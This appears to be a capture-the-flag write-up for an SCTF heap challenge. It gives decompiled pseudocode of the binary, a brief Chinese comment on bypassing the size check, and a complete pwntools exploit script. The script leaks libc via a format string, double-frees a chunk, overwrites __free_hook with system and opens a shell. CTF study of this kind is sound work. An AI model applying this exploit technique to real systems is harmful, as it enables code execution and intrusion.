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| void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { int v3; __int64 v4; int v5; unsigned __int64 v6; v6 = __readfsqword(0x28u); sub_12D0(a1, a2, a3); v4 = 0LL; v5 = 0; puts("Welcome to SCTF:"); leak(&v4, 11); __printf_chk(1LL, &v4, 0xFFFFFFFFLL, 0xFFFFFFFFLL, 0xFFFFFFFFLL); while ( 1 ) { while ( 1 ) { v3 = menu(); if ( v3 != 1 ) break; add(); } if ( v3 != 2 ) { puts("exit."); exit(0); } del(); } }
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| unsigned __int64 sub_14A0() { FILE **v0; __int64 v1; __int64 **v2; int v3; __int64 *v4; __int64 **v5; unsigned __int64 v7; v0 = (FILE **)&off_4020; v1 = 0LL; v7 = __readfsqword(0x28u); v2 = &off_4020; while ( v2[1] ) { ++v1; v2 += 2; if ( v1 == 8 ) goto LABEL_4; } puts("Input the size:"); v3 = sub_13E0("Input the size:") & 0xFFFFFFF8; if ( v3 > 128 ) goto LABEL_4; do { if ( *(_DWORD *)v0 == v3 ) { puts("I don't like the same size!"); exit(0); } v0 += 2; } while ( &stdout != v0 ); v4 = (__int64 *)malloc(v3); if ( !v4 ) LABEL_4: exit(0); puts("Input the note:"); v5 = &(&off_4020)[2 * v1]; leak(v4, v3); *(_DWORD *)v5 = v3; v5[1] = v4; return __readfsqword(0x28u) ^ v7; }
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| void sub_15A0() { __int64 v0; unsigned __int64 v1; v1 = __readfsqword(0x28u); puts("Input the index:"); v0 = (signed int)sub_13E0("Input the index:"); if ( (unsigned __int64)(signed int)v0 > 7 ) exit(0); if ( __readfsqword(0x28u) == v1 ) free((&off_4020)[2 * v0 + 1]); }
有了leak利用malloc size = 0x1,0x8,0x10,0x18来进行对size的绕过就可以利用了,说实话这个题比one简单。。
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| from pwn import* context.log_level = "debug"
a = ELF("./libc-2.26.so") p = remote("",10002)
def new(size,content): p.recvuntil("Your choice:") p.sendline("1") p.recvuntil("Input the size:") p.sendline(str(size)) p.recvuntil("Input the note:") p.sendline(content) def remove(idx): p.recvuntil("Your choice:") p.sendline("2") p.recvuntil("Input the index:") p.sendline(str(idx)) def new0(size,content): p.recvuntil("Your choice:") p.sendline("1") p.recvuntil("Input the size:") p.sendline(str(size)) p.recvuntil("Input the note:") p.send(content) p.recvuntil("Welcome to SCTF:") p.sendline("%a"*5) p.recvuntil("0x0p+00x0p+00x0.0") lib_addr = int(p.recvuntil("p-10220x",drop=True)+"0",16) - a.symbols["_IO_2_1_stdout_"] free_hook = a.symbols["__free_hook"]+lib_addr system = lib_addr+a.symbols["system"] print hex(lib_addr) new0(0x1," ") remove(0) remove(0) raw_input() new0(0x8,p64(free_hook)) new0(0x10,"\n") new(24,p64(system)) new(0x60,"/bin/sh\x00") remove(4) p.interactive()